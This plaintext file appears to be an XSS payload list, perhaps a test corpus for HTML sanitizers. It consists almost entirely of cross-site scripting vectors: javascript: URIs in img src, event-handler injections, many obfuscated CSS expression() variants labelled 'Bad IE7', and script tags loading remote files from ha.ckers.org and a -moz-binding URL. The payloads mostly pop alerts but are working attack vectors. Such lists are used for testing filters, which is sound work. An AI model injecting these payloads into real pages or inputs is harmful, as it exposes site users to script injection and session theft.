45 lines
3.8 KiB
Plaintext
45 lines
3.8 KiB
Plaintext
<img alt="<img onmouseover=confirm(1)//"<"">
|
|
'';!--"<xss>=&{()}<br />
|
|
<img src="javascript%3Aalert('xss');" /><br />
|
|
<img src="javascript:alert('xss');" /><br />
|
|
<img src="java script:alert('xss');" /><br />
|
|
<img
|
|
src=javascript:alert('XSS') /><br />
|
|
<font color='#FF6699"onmouseover="alert(1)//'>test</font>
|
|
<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
|
|
<div style="javascript:alert('xss');"></div><br />
|
|
<div style="background-image:url(javascript:alert('xss'));"></div><br />
|
|
<div style="background-image:url("javascript:alert('xss')" );"></div><br />
|
|
<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
|
|
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
|
|
<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
|
|
<div style="background-image: url('js:xss')"></div><br />
|
|
<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
|
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
|
|
%28%27xss%3f%29%29">x</a><br />
|
|
<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
|
|
<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
|
|
<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:Expre\ssion(alert('xss'));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:expre\ssion(alert('xss'));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
|
|
<strong>Bad IE7:</strong> <a style="xss:e\0078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
|
<strong>Bad IE7:</strong> <a style="background:url('java
|
|
script:eval(document.all.mycode.expr)')">hi</a><br />
|